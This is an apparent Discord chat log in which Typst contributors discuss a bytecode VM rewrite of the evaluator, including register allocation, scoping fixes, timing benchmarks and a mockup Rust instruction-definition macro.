Register optimization is simply the process of choosing the best registers so that as little moves or interactions with the stack as possible have to occur

#

It's 32 registers. Their width I don't know

#

But the registers aren't simply 64 bit numbers like in hardware, but complex values

#

At least I assume as much

west light Jan 21, 2024, 11:37 PM

#

cunning wadi Register optimization is simply the process of choosing the best registers so th...

Wouldn’t that need to assume the most common instructions/stack operations?

sly pecan Jan 21, 2024, 11:38 PM

#

west light Wouldn’t that need to assume the most common instructions/stack operations?

Considering it's a very specific workload it wouldn't really be guessing per se?

cunning wadi Jan 21, 2024, 11:38 PM

#

It just needs to check things like whether the value of one register is still being required

sturdy sequoia Jan 21, 2024, 11:38 PM

#

cunning wadi It just needs to check things like whether the value of one register is still be...

Exactly, but before I was doing in a post-process pass, but I realized that I can just do it as I go which is much faster and easier

cunning wadi Jan 21, 2024, 11:39 PM

#

Or it could determine that one register should be used for something else instead and the existing value can simply be dropped onto the stack in the meantime

west light Jan 21, 2024, 11:39 PM

#

sturdy sequoia Exactly, but before I was doing in a post-process pass, but I realized that I ca...

Faster easier == better solution

glad urchin Jan 21, 2024, 11:40 PM

#

west light Faster easier == better solution

*footnote: it also causes all system files to be instantly deleted

sturdy sequoia Jan 21, 2024, 11:40 PM

#

cunning wadi Or it could determine that one register should be used for something else instea...

Mind you, we don't have a stack

#

I mean we have more than one

#

but they're for very specific situations

#

for example we have an iterator stack to store rust native iterators in loops

#

since typst doesn't have iterators

cunning wadi Jan 21, 2024, 11:41 PM

#

What happens when a function is called?

#

Where does the context of the calling function end up

sturdy sequoia Jan 21, 2024, 11:42 PM

#

cunning wadi What happens when a function is called?

it copies all of the captured values into the function's scope, same with the args, then spins up a new VM

#

the reason why it spins up a new VM is because the calls get memoized

#

and the VMs are dirt cheap to initialize since they mostly borrow values

cunning wadi Jan 21, 2024, 11:42 PM

#

Huh

sturdy sequoia Jan 21, 2024, 11:43 PM

#

So it's not as fast as possible but that isn't the goal either

cunning wadi Jan 21, 2024, 11:43 PM

#

Do the arguments not end up in specific registers but instead some special value then?

sturdy sequoia Jan 21, 2024, 11:44 PM

#

cunning wadi Do the arguments not end up in specific registers but instead some special value...

they end up in a list of arguments, and the functions gets them one-by-one into registers

#

I plan on replacing locals and args with registers but I haven't done it yet

west light Jan 21, 2024, 11:44 PM

#

sturdy sequoia the reason why it spins up a new VM is because the calls get memoized

Not an option I usually have access to. But I like it.

cunning wadi Jan 21, 2024, 11:44 PM

#

What happens if a function takes more than 32 arguments?

sturdy sequoia Jan 21, 2024, 11:44 PM

#

west light Not an option I usually have access to. But I like it.

Again, it's not a VM in the traditional sense, it's a VM like the Java VM

sturdy sequoia Jan 21, 2024, 11:44 PM

#

cunning wadi What happens if a function takes more than 32 arguments?

yeah then you'd be out of registers 😄

#

There is no stack 😂

#

Mind you you can call a function with more than 32 args

glad urchin Jan 21, 2024, 11:45 PM

#

sturdy sequoia Mind you you can call a function with more than 32 args

does it blow up Typst then?

#

crash and burn?

west light Jan 21, 2024, 11:45 PM

#

Is a dictionary one argument?

sturdy sequoia Jan 21, 2024, 11:45 PM

#

glad urchin does it blow up Typst then?

no, it just works

sturdy sequoia Jan 21, 2024, 11:45 PM

#

west light Is a dictionary one argument?

I don't understand the question

cunning wadi Jan 21, 2024, 11:46 PM

#

sturdy sequoia Mind you you can call a function with more than 32 args

Where do the excess arguments end up?

#

That was my actual question

sturdy sequoia Jan 21, 2024, 11:46 PM

#

cunning wadi Where do the excess arguments end up?

basically, it allocates a Value::Args in a register and it pushed them into it one-by-one, so you can call with as many args as you want

#

When a function is called, it loads the arguments into registers on use

cunning wadi Jan 21, 2024, 11:47 PM

#

Oh I see

sturdy sequoia Jan 21, 2024, 11:47 PM

#

So you can have as many args as you want

west light Jan 21, 2024, 11:47 PM

#

I’m just guessing the arguments are by pointer and that there typically just one Args item

sturdy sequoia Jan 21, 2024, 11:47 PM

#

west light I’m just guessing the arguments are by pointer and that there typically just one...

indeed, it's just one Args passed by value

west light Jan 21, 2024, 11:48 PM

#

Or perhaps nothing.

sturdy sequoia Jan 21, 2024, 11:51 PM

#

west light Or perhaps nothing.

indeed, if there are no args it doesn't bother to allocate anythign

west light Jan 21, 2024, 11:54 PM

#

So what do the other 31 registers do? Do you mark them as in use and just allocate deallocate them based on need?

sturdy sequoia Jan 21, 2024, 11:55 PM

#

west light So what do the other 31 registers do? Do you mark them as in use and just alloca...

basically, but in a function being called arguments are stored in their own special purpose registers

#

so you always have 32 registers

#

it's only when you're calling a function that it uses the Args data structure

#

Ok, methods are finally fixed afaik

#

Now all that's left are the scopes being a bit borked yet again

#

but I'll fix that next time I have time to work on it

#

I mean I did figure it out: (noting here for future me)
It cannot capture from the parent's parent's scope. This means that I need to create a bigger hierarchy of captures and be able to do recursive capturing, not particularly hard but I need to do it

tight glade Jan 22, 2024, 9:28 AM

#

glad urchin *footnote: it also causes all system files to be instantly deleted

Still the best solution 😂

tight glade Jan 22, 2024, 9:30 AM

#

sturdy sequoia I mean I did figure it out: (noting here for future me) It cannot capture from t...

Exciting times

sturdy sequoia Jan 22, 2024, 11:47 AM

#

I fixed the scoping issues

#

Now I have other issues, but I'm making progress 😂

sturdy sequoia Jan 22, 2024, 11:48 AM

#

tight glade Exciting times

Thanks ❤️

glad urchin Jan 22, 2024, 11:50 AM

#

tight glade Still the best solution 😂

@sturdy sequoia we're waiting for the fix

sturdy sequoia Jan 22, 2024, 11:51 AM

#

glad urchin <@130737672951037952> we're waiting for the fix

no, it's the price you must pay for fast document compilations 😈

glad urchin Jan 22, 2024, 11:51 AM

#

sturdy sequoia no, it's the price you must pay for fast document compilations 😈

oh ok

#

i can understand that

untold turret Jan 22, 2024, 11:52 AM

#

sturdy sequoia I fixed the scoping issues

you said continue in next weekend, probably.

sturdy sequoia Jan 22, 2024, 11:52 AM

#

untold turret you said continue in next weekend, probably.

I know but I can't stop

#

who cares that I have a technical interview later today 😂

untold turret Jan 22, 2024, 11:52 AM

#

Very charm🔥

sturdy sequoia Jan 22, 2024, 11:52 AM

#

I am wayyyyy too junior for this position

#

I almost feel bad

sly pecan Jan 22, 2024, 11:53 AM

#

Fake it till you make it

sturdy sequoia Jan 22, 2024, 11:56 AM

#

BTW, removing the instruction deduplication almost halfed rust's compile time 💀

#

So it was definitely worth it

#

And I checked another bytecode VM and they do it the way I am now doing it so I'm not re-inventing the wheel

tight glade Jan 22, 2024, 12:52 PM

#

sturdy sequoia who cares that I have a technical interview later today 😂

obsession i cannot sleep

sturdy sequoia Jan 22, 2024, 12:53 PM

#

tight glade **obsession** i cannot sleep

you can't? why 😦

sturdy sequoia Jan 22, 2024, 12:53 PM

#

sly pecan Fake it till you make it

That's the plan, with my good friend ChatGPT 😂

tight glade Jan 22, 2024, 12:53 PM

#

No you can't, because you're obsessed

sturdy sequoia Jan 22, 2024, 12:53 PM

#

tight glade No you can't, because you're obsessed

Oh no, I slept like a baby uwu

#

Could've slept some more tho

tight glade Jan 22, 2024, 12:53 PM

#

Wonderful ❤️❤️❤️

#

You do godly work that's why

sturdy sequoia Jan 22, 2024, 1:14 PM

#

So now there is something wrong with conditions producing a boolean angryeyes

#

I figured it out

#

But now I really must prepare my interview 😂

sturdy sequoia Jan 22, 2024, 4:21 PM

#

Next issue: some captures don't work for reasons unknown 😐

tight glade Jan 22, 2024, 6:54 PM

#

sturdy sequoia Next issue: some captures don't work for reasons unknown 😐

the guy is UNSTIPPABLE

sturdy sequoia Jan 22, 2024, 6:54 PM

#

tight glade the guy is UNSTIPPABLE

UNTYPSTABLE

tight glade Jan 22, 2024, 6:55 PM

#

😎 😎 😎 😎 😎 😎 😎 😎 😎 😎 😎

sturdy sequoia Jan 22, 2024, 6:56 PM

#

no no

#

typstguy

cunning wadi Jan 22, 2024, 6:56 PM

#

sturdy sequoia UNTYPSTABLE

Can't even pandoc Dherse -o Dherse.typ :(

sturdy sequoia Jan 22, 2024, 6:57 PM

#

cunning wadi Can't even `pandoc Dherse -o Dherse.typ` :(

😭

sturdy sequoia Jan 23, 2024, 12:02 AM

#

Ok, so, it can compiler: the preface and the introduction

#

getting there!

#

Chapter 1 compiles too 😎

#

Now tablex doesn't compile 😭

#

@glad urchin see what you're doing to me!

glad urchin Jan 23, 2024, 12:14 AM

#

sturdy sequoia <@180813971853410305> see what you're doing to me!

i mean, did it compile in the first place? lol

sturdy sequoia Jan 23, 2024, 12:21 AM

#

Ok, it's improving

sturdy sequoia Jan 23, 2024, 12:37 AM

#

I fixed variable shadowing

#

and now I'm off to bed

#

😴

sturdy sequoia Jan 23, 2024, 4:06 PM

#

It almost compiles the thesis now

#

it fails many iterations in

#

I think my code just found a bug in queries

#

🧐

sturdy sequoia Jan 23, 2024, 4:50 PM

#

@tight glade @sly pecan @glad urchin @left night @feral imp I can now confirm that the new evaluation system is significantly faster, I don't know yet exactly how much faster (I need to do more testing) but at least 3x faster even when taking into account the extra compilation that needs to be performed before eval 🎉

#

🚀

#

And I think that with borrowing and a few other optimizations it might be even faster 😄

sly pecan Jan 23, 2024, 4:51 PM

#

sturdy sequoia <@553622654163353610> <@399269065388195842> <@180813971853410305> <@311948531835...

How big a part of compilation is eval though?

#

I assume compilation as a whole isn't 3x faster

sturdy sequoia Jan 23, 2024, 4:52 PM

#

sly pecan How big a part of compilation is eval though?

In this case I am trying on an eval heavy document while I keep fixing bugs

#

💀

#

Ok, so using the handy-dandy --timings arguments:

Before rework: 5.7s of which 1.2s is layout => eval is 4.5s
After rework: 2.33s of which 1.2s is layout => eval is 1.13s

#

Meaning a speedup of almost 4x in eval

sly pecan Jan 23, 2024, 4:54 PM

#

is that your thesis?

sturdy sequoia Jan 23, 2024, 4:54 PM

#

These are obviously very rough numbers because compilation is cached across invokations

sturdy sequoia Jan 23, 2024, 4:54 PM

#

sly pecan is that your thesis?

No, it's a second document I'm using for testing

#

My thesis still doesn't compile, but I don't know what the bug is... YET!

feral imp Jan 23, 2024, 6:06 PM

#

4x is nuts.

#

I'd have said 20%-80% percent would be worth it!

sturdy sequoia Jan 23, 2024, 6:28 PM

#

@left night I do think I will end up rewriting it as an array of structs because currently I am quite limited in doing things like "either a register, a constant, a local, or an arg" which leads to way more instructions than needed

#

Instead I could just have a system like OpCode(Flags) being 16 bits where the Opcode is 8 bits and the flags are 8 bits indicating how the arguments work

#

I think that could lead to much faster execution and less instructions overall

low sapphire Jan 23, 2024, 6:29 PM

#

sturdy sequoia In this case I am trying on an eval heavy document while I keep fixing bugs

does eval heavy mean you actually have to use eval in typst? like mitex does?

sturdy sequoia Jan 23, 2024, 6:34 PM

#

low sapphire does eval heavy mean you actually have to use eval in typst? like mitex does?

no, it means it runs a lot of typst code

#

like you would see using cetz or tablex, or anything that does data processing in general

low sapphire Jan 23, 2024, 6:35 PM

#

ah okay

atomic violet Jan 23, 2024, 6:38 PM

#

sturdy sequoia <@311948531835469827> I do think I will end up rewriting it as an array of struc...

I think you meant "structure of arrays" here, maybe? 🤔

sturdy sequoia Jan 23, 2024, 6:39 PM

#

atomic violet I think you meant "structure of arrays" here, maybe? 🤔

oh yes sorry

#

I'm tired

atomic violet Jan 23, 2024, 6:39 PM

#

is there a reason for it though other than some instructions possibly being longer than they should be?

sturdy sequoia Jan 23, 2024, 6:39 PM

#

atomic violet is there a reason for it though other than some instructions possibly being long...

It saves memory since there is no wasted space

#

It saves cache utilization (for the same reason)

#

It can be faster

atomic violet Jan 23, 2024, 6:40 PM

#

well, it can, but you will need to measure it

sturdy sequoia Jan 23, 2024, 6:40 PM

#

It can save tons of instructions by giving me more freedom in how I am "crafting" the instructions by being able to have more than one value

sturdy sequoia Jan 23, 2024, 6:40 PM

#

atomic violet well, it can, but you will need to measure it

indeed

atomic violet Jan 23, 2024, 6:40 PM

#

the problem with SoA is that it's harder to support, and here I don't see much reason to use it

#

instructions are executed in sequential order anyway, so you will get good cache occupancy thanks to prefetching either way

sturdy sequoia Jan 23, 2024, 6:41 PM

#

atomic violet the problem with SoA is that it's harder to support, and here I don't see much r...

If I go the SoA route, I'll write a proc-macro to generate the instruction and builders for them, that way it's not too error-prone

atomic violet Jan 23, 2024, 6:41 PM

#

even if instructions are like 32 bytes long

sturdy sequoia Jan 23, 2024, 6:41 PM

#

atomic violet even if instructions are like 32 bytes long

That's true, but I would ideally like to keep them as short as possible to get the most cache occupancy possible

atomic violet Jan 23, 2024, 6:42 PM

#

well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for sure

sturdy sequoia Jan 23, 2024, 6:43 PM

#

atomic violet well, L1 is 32 kb anyway - that's pretty big, enough to fit every hotspot for su...

Well that's platform dependent :-p

atomic violet Jan 23, 2024, 6:43 PM

#

thing is, SoA is usually implemented if you can take the advantage of parallelism, because you will be able to work with multiple objects anyway thanks to SIMD

#

and here it is not the case

#

well

#

unless you are going to implement some kind of SIMD instruction parsing...

sturdy sequoia Jan 23, 2024, 6:44 PM

#

atomic violet unless you are going to implement some kind of SIMD instruction parsing...

no lol

atomic violet Jan 23, 2024, 6:44 PM

#

which would be kind of cool but also too cool

sturdy sequoia Jan 23, 2024, 6:44 PM

#

OUT OF ORDER EXECUTION

#

😂

atomic violet Jan 23, 2024, 6:44 PM

#

lmao

#

anyway, you can try, it would be interesting to see the difference for sure

#

how are constants stored? is it like a global (for every function/block of code/something) array which you can index within some instructions?

sturdy sequoia Jan 23, 2024, 6:47 PM

#

atomic violet how are constants stored? is it like a global (for every function/block of code/...

it's module-local or function-local (depending if you're in a module or a function, function always have their own copies of everything)

atomic violet Jan 23, 2024, 6:49 PM

#

ok, makes sense... I was going to say that if you want to improve code cache occupancy it might be worth considering improving cache occupancy of something else instead (making layout of everything more predictable will make predictable layout of code even more predictable), but I suppose it's not as simple as it may seem🤔

#

anyway, do your thing and try to compensate for carbon emissions of your compilations, I suppose 😅

sturdy sequoia Jan 23, 2024, 6:51 PM

#

What I want is mostly to get a first draft that works, and then try different improvements mostly

tight glade Jan 23, 2024, 6:52 PM

#

sturdy sequoia I think my code just found a bug in queries

nice

tight glade Jan 23, 2024, 6:52 PM

#

sturdy sequoia <@553622654163353610> <@399269065388195842> <@180813971853410305> <@311948531835...

omg

sturdy sequoia Jan 23, 2024, 6:54 PM

#

tight glade nice

it did not, queries found a bug in my code 😂

left night Jan 23, 2024, 6:59 PM

#

@sturdy sequoia fun memories. this was the "first" content rework, which moved from an enum to something pretty close to what we have now (but obviously with way less features). the dynamic Attr thing only came later. this goes to show how far-reaching a single bad design decision is.

sturdy sequoia Jan 23, 2024, 7:11 PM

#

left night <@130737672951037952> fun [memories](<https://github.com/typst/typst/commit/37ac...

Actually with hindsight I think it made a lot of sense, especially when you consider that you didn't have the proc-macro at the time

tight glade Jan 23, 2024, 9:04 PM

#

What's the bad design decision here?

sturdy sequoia Jan 23, 2024, 9:07 PM

#

tight glade What's the bad design decision here?

moving to dyn structs

#

the old Content sytem with a EcoVec<Attr> to store fields

tight glade Jan 23, 2024, 9:08 PM

#

Hmmm 🤔

sly pecan Jan 23, 2024, 9:20 PM

#

sturdy sequoia OUT OF ORDER EXECUTION

Speculative execution

untold turret Jan 23, 2024, 11:01 PM

#

sturdy sequoia Ok, so using the handy-dandy `--timings` arguments: - Before rework: 5.7s of whi...

cold compilation? What about incrementally?

sturdy sequoia Jan 23, 2024, 11:02 PM

#

untold turret cold compilation? What about incrementally?

I can't say just yet, I'll try once I have a larger doc!

#

But eval speed seems to be really improved

#

incrementally it should be even higher 🤞

#

I'm still having somes issues in tablex and running tests is actually surprisingly hard (because spans don't match for... reasons)

untold turret Jan 23, 2024, 11:05 PM

#

Have you already applied comemo, or this is a result of executing bytecode without caching.

sturdy sequoia Jan 23, 2024, 11:06 PM

#

untold turret Have you already applied comemo, or this is a result of executing bytecode witho...

yes, there is already memoization for closure calls and module loading

#

but there is no caching dedicated to compilation (yet)

untold turret Jan 23, 2024, 11:09 PM

#

You have been announced 2x, 3x, 4x performance improvement again and again. There should be at one another science

sturdy sequoia Jan 23, 2024, 11:10 PM

#

untold turret You have been announced 2x, 3x, 4x performance improvement again and again. Ther...

Well it's been very gradual 😄

#

Small gains x infinity = big gains 😄

#

#

I think it's quite nice because I have also made bytecode compilmation part of the timings

glad urchin Jan 23, 2024, 11:12 PM

#

sturdy sequoia I'm still having somes issues in tablex and running tests is actually surprising...

proof that tablex is great to extensively test eval

#

😂

sturdy sequoia Jan 23, 2024, 11:13 PM

#

glad urchin proof that tablex is great to extensively test eval

yes 😂

glad urchin Jan 23, 2024, 11:13 PM

#

sturdy sequoia I think it's quite nice because I have also made bytecode compilmation part of t...

Q: is bytecode compilation memoized as well?

sturdy sequoia Jan 23, 2024, 11:13 PM

#

glad urchin Q: is bytecode compilation memoized as well?

no

#

but eventually it will be of course

glad urchin Jan 23, 2024, 11:13 PM

#

i see

untold turret Jan 23, 2024, 11:13 PM

#

The thesis and, the table package.

sturdy sequoia Jan 23, 2024, 11:14 PM

#

I also added module eval as a thing, I just need to add closure compilation

glad urchin Jan 23, 2024, 11:15 PM

#

cuz i often see some talks about the idea of using a JIT but I think that's going perhaps way too far
some (comparatively) simple bytecode memoization could perhaps be more suitable

#

if that makes sense

sturdy sequoia Jan 23, 2024, 11:15 PM

#

I generally agree, I think the gains we'll have here will already be awesome

untold turret Jan 23, 2024, 11:16 PM

#

sturdy sequoia I think it's quite nice because I have also made bytecode compilmation part of t...

Is bytecode serializable? I think we can have a /target directory like rust storing black hole of bytecode now. 😂

sturdy sequoia Jan 23, 2024, 11:17 PM

#

untold turret Is bytecode serializable? I think we can have a /target directory like rust stor...

it would be trivially serializable 😂

glad urchin Jan 23, 2024, 11:17 PM

#

53 GiB typst-target folder

sturdy sequoia Jan 23, 2024, 11:17 PM

#

it's just a BUNCH of u16s

glad urchin Jan 23, 2024, 11:17 PM

#

i mean what can i say

#

it would probably speed up compilation

#

who doesnt want that

sturdy sequoia Jan 23, 2024, 11:18 PM

#

Really depends how long it takes to compile to bytecode

glad urchin Jan 23, 2024, 11:18 PM

#

fair

sturdy sequoia Jan 23, 2024, 11:19 PM

#

Like compiling most of the bytecode in my thesis takes around 20ms

#

and my thesis is long and includes tablex 😂

glad urchin Jan 23, 2024, 11:19 PM

#

sorry but 20ms is too long

#

i want 0

sturdy sequoia Jan 23, 2024, 11:19 PM

#

and I think that parsing and compilation could be deferred to multiple threads 😎

cunning wadi Jan 23, 2024, 11:19 PM

#

glad urchin i want 0

just use 0.10.0

glad urchin Jan 23, 2024, 11:19 PM

#

cunning wadi just use 0.10.0

darn im really stupid

#

thanks

cunning wadi Jan 23, 2024, 11:20 PM

#

happy to help 👍

glad urchin Jan 23, 2024, 11:20 PM

#

im gonna make a patch for typst 0.[version with bytecode].0 which just replaces all Compile implementations with a mock

#

that should help

untold turret Jan 23, 2024, 11:22 PM

#

sturdy sequoia it would be trivially serializable 😂

And also we can say that result of evaluation are safe to cached in disk? We were imagining a persistent comemo cache, but something like pointers prevent it.

cunning wadi Jan 23, 2024, 11:22 PM

#

from what I saw, yes

sturdy sequoia Jan 23, 2024, 11:23 PM

#

untold turret And also we can say that result of evaluation are safe to cached in disk? We wer...

Well you could cache them but that would require serializing (which is slow)

#

but for bytecode then it's trivial because there are no pointers

#

everything is done with IDs into shared arrays

#

like ConstId for constants, StringID, etc.

untold turret Jan 23, 2024, 11:25 PM

#

sturdy sequoia Well you could cache them but that would require serializing (which is slow)

Some of them, I refer to at least @onyx furnace's a large set of plugin calls in his 2500 pages document, are valuable to persist.

sturdy sequoia Jan 23, 2024, 11:25 PM

#

untold turret Some of them, I refer to at least <@408824262015713281>'s a large set of plugin ...

true, but in the case of @onyx furnace's doc, I think moving to wasmtime would already be a huge improvement

#

I have tested it and it like halved the compilation time

cunning wadi Jan 23, 2024, 11:26 PM

#

untold turret Some of them, I refer to at least <@408824262015713281>'s a large set of plugin ...

maybe there could be a way of timing calls to check how long they each take and only keeping those that ran very long

#

(doesn't have to be time specifically, could also just be counting number of instructions executed)

sturdy sequoia Jan 23, 2024, 11:27 PM

#

cunning wadi maybe there could be a way of timing calls to check how long they each take and ...

the problem isn't that the individual calls are slow, is that there are so goddamn many of them 😂

#

That's why I've been thinking of "deferred" calls, where the value is only known when it's needed

#

But of course that would require plugins to be Send + Sync

#

Anyway, I'm off to bed ❤️

cunning wadi Jan 23, 2024, 11:28 PM

#

that sounds like a good idea for me as well

untold turret Jan 23, 2024, 11:28 PM

#

I think we will get furthermore improvement. But you are right it is other ways to improve and already fast enough even without persisting cache.

untold turret Jan 23, 2024, 11:29 PM

#

sturdy sequoia Anyway, I'm off to bed ❤️

Another day on #1176509648707256370.

onyx furnace Jan 24, 2024, 2:02 AM

#

sturdy sequoia and I think that parsing and compilation could be deferred to multiple threads �...

will this make it faster? i think this is not parallize-able.

onyx furnace Jan 24, 2024, 2:03 AM

#

sturdy sequoia true, but in the case of <@408824262015713281>'s doc, I think moving to wasmtime...

yes. in that case, time is used in plugin calls

onyx furnace Jan 24, 2024, 2:04 AM

#

sturdy sequoia

the flamegraph looks amazing

#

may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc should be "eval-heavy" ones?

sturdy sequoia Jan 24, 2024, 7:33 AM

#

onyx furnace will this make it faster? i think this is not parallize-able.

It's more that we could parse all of the files in your project all at once

sturdy sequoia Jan 24, 2024, 7:34 AM

#

onyx furnace the flamegraph looks amazing

yes I am soooooo happy about the --timings feature and how it came out. Thank you very very much to you and @untold turret for the idea of making it compatible with chrome traces! It's awesome 😄

left night Jan 24, 2024, 7:34 AM

#

sturdy sequoia It's more that we could parse all of the files in your project all at once

only if import/include is required to have static paths or if we do it optimistically for those that are static

#

but overall yes

sturdy sequoia Jan 24, 2024, 7:35 AM

#

onyx furnace may i know which doc you use for testing? i guess thesis, tablex doc, cetz doc s...

Yes of course, I am using several ones, but my "workhorse" for this work is a mandelbrot. My thesis doesn't compile yet, I am slowly working through the automated tests to figure out what is wrong 😐

left night Jan 24, 2024, 7:35 AM

#

but we potentially also eval shared leafs twice unnecessarily

sturdy sequoia Jan 24, 2024, 7:35 AM

#

left night only if import/include is required to have static paths or if we do it optimisti...

In the end what I find funny is that parsing takes significantly longer than compilation which I was not expecting 😂

left night Jan 24, 2024, 7:36 AM

#

and parsing we can notably not do completely in parallel

#

since we obviously need to find those imports

sturdy sequoia Jan 24, 2024, 7:37 AM

#

true true, but perhaps the parser could automatically add "static" imports to a big list of files that are "in the path" so-to-speak for parsing and compiling in a deferred way?

#

It's no big deal either way, it doesn't account for very much anyway

#

But I think it's a "low hanging fruit" for making eval faster

sturdy sequoia Jan 24, 2024, 7:39 AM

#

sturdy sequoia But I think it's a "low hanging fruit" for making eval faster

slightly faster *

#

@left night BTW I hope you don't mind that I am looking into eval but I like these "bigger" projects, I find them really rewarding to work on and with all of the reworks you're doing in other parts of the codebase I didn't want to cause trouble there so I figured eval was a good place to work on to cause as little friction as possible on your own work

#

It also has really motivated me to work on Typst again ❤️

#

Really sorry for being a bit harsh with the revoke thing the other day 😐

left night Jan 24, 2024, 7:42 AM

#

Don't worry about it, it's already forgotten

#

It's very cool that you're taking this bytecode thing on

onyx furnace Jan 24, 2024, 7:58 AM

#

sturdy sequoia Yes of course, I am using several ones, but my "workhorse" for this work is a ma...

mandelbrot is definitely very scripting-heavy! nice for this task😂

sturdy sequoia Jan 24, 2024, 8:05 AM

#

onyx furnace mandelbrot is definitely very scripting-heavy! nice for this task😂

indeed 😂

#

I wanted something that would really test eval more than anything else

sturdy sequoia Jan 24, 2024, 2:07 PM

#

@left night are destructure patterns in for loop supposed to be defined within the parent's scope? like this:

for i in range(10) { ... }

// Is `i` valid here?
i

#

or should i remain scoped to the loop?

#

I think it should be the later but I'm curious what you think

feral imp Jan 24, 2024, 2:07 PM

#

Former is how it is done in R, so.... I don't think so.

sturdy sequoia Jan 24, 2024, 2:08 PM

#

feral imp Former is how it is done in R, so.... I don't think so.

Aren't you supposed to like R? 😂

feral imp Jan 24, 2024, 2:08 PM

#

Off-topic.

sturdy sequoia Jan 24, 2024, 2:09 PM

#

feral imp Off-topic.

ferrisBigBrain

left night Jan 24, 2024, 2:11 PM

#

sturdy sequoia <@311948531835469827> are destructure patterns in for loop supposed to be define...

It should remain scoped to the loop (that's also how it works on main from a quick test).

sturdy sequoia Jan 24, 2024, 2:12 PM

#

left night It should remain scoped to the loop (that's also how it works on main from a qui...

yes, I figured it's just a bit ugly with the way my compiler currently works

#

I'll fix that 😉

untold turret Jan 24, 2024, 2:20 PM

#

There may be some specification interpreter for typst, which never launch too many optimization. And the answer is its result.

sturdy sequoia Jan 24, 2024, 4:36 PM

#

@left night what do you think of a macro like this for creating instructions:

#


isr! {
    Add -> Register | Local {
        lhs: Register | Constant | Local | Global | Param | Capture,
        rhs: Register | Constant | Local | Global | Param | Capture,
    } => |add| {
        std::ops::add(add.lhs(), add.rhs())
    }

    #[scope]
    Iter {
        value: Register | Constant | Local | Global | Param | Capture,
        target: Iterator,
    }

    #[flow]
    And {
        lhs: Register | Constant | Local | Global | Param | Capture,
        rhs: Register | Constant | Local | Global | Param | Capture,
        target: Jump,
    } => |and, cf| {
        let lhs = and.lhs().cast::<bool>()?;
        if !lhs {
            cf.jump(and.target())

            Value::None
        } else {
            let rhs = and.rhs().cast::<bool>()?;

            Value::Bool(lhs && rhs)
        }
    }

    #[flow]
    If {
        condition: Register | Constant | Local | Global | Param | Capture,
        then: Jump,
        else: Jump | None,
    } => |if, cf| {
        if if.condition().cast::<bool>()? {
            cf.jump(if.then())
        } else {
            cf.jump(if.else())
        }
    }

    #[flow]
    #[scope(consume)]
    Label {
        label: Jump,
        pop: bool,
    } => |label| {
        if label.pop() {
            label.scope().pop()
        }
    }

    #[flow]
    Next -> Register | Local {
        iter: Iterator,
        bottom: Jump,
    } => |next, cf| {
        if let Some(value) = next.iter().next() {
            value
        } else {
            cf.jump(next.bottom())
            Value::None
        }
    }
    #[flow]
    Jump {
        target: Jump,
    } => |jump, cf| {
        cf.jump(jump.target())
    }
    
    #[flow]
    Break {
        target: Jump,
    } => |break, cf| {
        // We want to go into breaking mode.
        cf.break(break.target())
    }
}

#

(obviously mockup code)

glad urchin Jan 24, 2024, 4:49 PM

#

sturdy sequoia ```rs isr! { Add -> Register | Local { lhs: Register | Constant | L...

Does that also define the instructions as types, or only implement traits?

sturdy sequoia Jan 24, 2024, 5:00 PM

#

glad urchin Does that also define the instructions as types, or only implement traits?

it would create a bunch of things actually

#

all of the opcodes (as a repr(u8) enum), all of the bitflags for the different types that each argument can take, etc.

#

and builder structs for every single instruction to make creation nicer

tight glade Jan 24, 2024, 5:01 PM

#

sturdy sequoia ```rs isr! { Add -> Register | Local { lhs: Register | Constant | L...

I have no idea what it means at all 😬😅
What does -> means

sturdy sequoia Jan 24, 2024, 5:01 PM

#

tight glade I have no idea what it means at all 😬😅 What does -> means

defines the output of the instruction

#

so Add produces either a Register or a Local

#

and then when the closure is called, it would produce a Value that would automatically be stored in the right place

tight glade Jan 24, 2024, 5:03 PM

#

Hmmm maybe i just don't have enough context to understand
But typically what is the right place

sturdy sequoia Jan 24, 2024, 5:03 PM

#

tight glade Hmmm maybe i just don't have enough context to understand But typically what is ...

It depends, it will either be stored in a register or stored in a local

#

my idea is that it can be done with the one instruction

tight glade Jan 24, 2024, 5:04 PM

#

But don't we need to know which register or local?

sturdy sequoia Jan 24, 2024, 5:06 PM

#

tight glade But don't we need to know which register or local?

exactly

#

that's the annoying part right now

#

with this it could be made much easier

#

I would also write it in a binary format with dynamic length instructions

tight glade Jan 24, 2024, 5:09 PM

#

I remain confused as to what happens precisely as a consequence of this macro invocation

I can only work with what i imagine is needed for your vm so I'd suggest choosing one of the simplest instructions and writing the non pseudo code version of the macro

sturdy sequoia Jan 24, 2024, 5:10 PM

#

It would produce:

tight glade Jan 24, 2024, 5:10 PM

#

Wouldn't dynamic length instructions complicate jumping z lot?

glad urchin Jan 24, 2024, 5:10 PM

#

sturdy sequoia all of the opcodes (as a `repr(u8)` enum), all of the bitflags for the different...

Wouldn't it be better to create the enum separately and have a macro to implement all of the auxiliary things?

sturdy sequoia Jan 24, 2024, 5:10 PM

#

A builder for each instruction
The Instruction enum
The Compiler struct
The Executor struct
An accessor for each instruction
The eval method on the executor

glad urchin Jan 24, 2024, 5:10 PM

#

Maybe even a derive macro

sturdy sequoia Jan 24, 2024, 5:10 PM

#

glad urchin Maybe even a derive macro

I want a single macro doing everything, specifically handling the dynamic length instructions

glad urchin Jan 24, 2024, 5:11 PM

#

Yeah well i don't

#

😎

#

lol jk

#

But I mean I just think it's weird to generate the types as well, idk

#

Unless it would be really hard to generate the types by hand

#

Somehow

tight glade Jan 24, 2024, 5:12 PM

#

sturdy sequoia - A builder for each instruction - The `Instruction` enum - The `Compiler` struc...

Nice! It does all the job 😂

Then to implement eval or bytecode for something you'd just return a list of instructions?

#

Well i see an interest in grouping all that logic, would the macro be comprehensible by mere mortals? 😁

sturdy sequoia Jan 24, 2024, 5:15 PM

#

tight glade Well i see an interest in grouping all that logic, would the macro be comprehens...

the macro would definitely be a mess 💀

tight glade Jan 24, 2024, 5:15 PM

#

😭😂

sturdy sequoia Jan 24, 2024, 5:16 PM

#

but it would make reading the VM code much much easier

tight glade Jan 24, 2024, 5:16 PM

#

Like how do you plan to handle dynamic length instructions?

sturdy sequoia Jan 24, 2024, 5:16 PM

#

tight glade Like how do you plan to handle dynamic length instructions?

based on each opcode it would know how many bytes to read

tight glade Jan 24, 2024, 5:17 PM

#

Sounds like you maybe need zero abstraction types to handle that complexity and then combine these lower levels brick to build an system in which you can express the vm

sturdy sequoia Jan 24, 2024, 5:18 PM

#

it would look like:

| 8-bit  | 8-bit  |     16-bit     | 8-bit  |     16-bit     | 8-bit  |     16-bit     |
|--------|--------|----------------|--------|----------------|--------|----------------|
